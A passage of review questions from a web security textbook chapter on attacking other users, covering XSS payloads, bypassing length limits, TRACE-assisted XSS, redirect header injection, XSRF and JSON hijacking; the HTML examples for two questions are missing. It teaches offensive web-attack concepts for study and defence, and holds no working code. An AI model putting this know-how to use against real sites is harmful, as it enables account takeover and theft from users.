Chapter 12  ■ Attacking Other Users

6. How does the browser’s same origin policy impinge upon the use of

the Ajax technology 

XMLHttpRequest

?

7. Name three possible attack payloads for XSS exploits (that is, the mali-

cious actions that you can perform within another user’s browser, not

the methods by which you deliver the attacks).

8. You discover a function which copies the value of some user-supplied

data into the target of an image tag:

The data is stored within the application and will be returned to other

authenticated users who view the relevant page. The application is

HTML-encoding the 

<

and 

>

characters, preventing you from breaking

out of the image tag. What two categories of attack can you perform?

9. You have discovered a reflected XSS vulnerability where you can inject

arbitrary data into a single location within the HTML of the returned

page. The data inserted is truncated to 50 bytes, but you want to inject a

lengthy script. You prefer not to call out to a script on an external

server. How can you work around the length limit?

10. You discover a reflected XSS flaw in a request that must use the 

POST

method. What delivery mechanisms are feasible for performing an attack?

11. How can an attacker make use of the 

TRACE

method to facilitate an XSS

attack?

12. You discover an application function where the contents of a query

string parameter are inserted into the 

Location

header in an HTTP redi-

rect. What three different types of attacks can this behavior potentially

be exploited to perform?

13. Your very first request to a banking application returns HTML like the

following: 

What vulnerability can you immediately diagnose here, without per-

forming any further testing?

14. What is the main precondition that must exist to enable an XSRF attack

against a sensitive function of an application?

15. What three defensive measures can each be used to prevent JSON

hijacking attacks?

Download 5,76 Mb.

Do'stlaringiz bilan baham: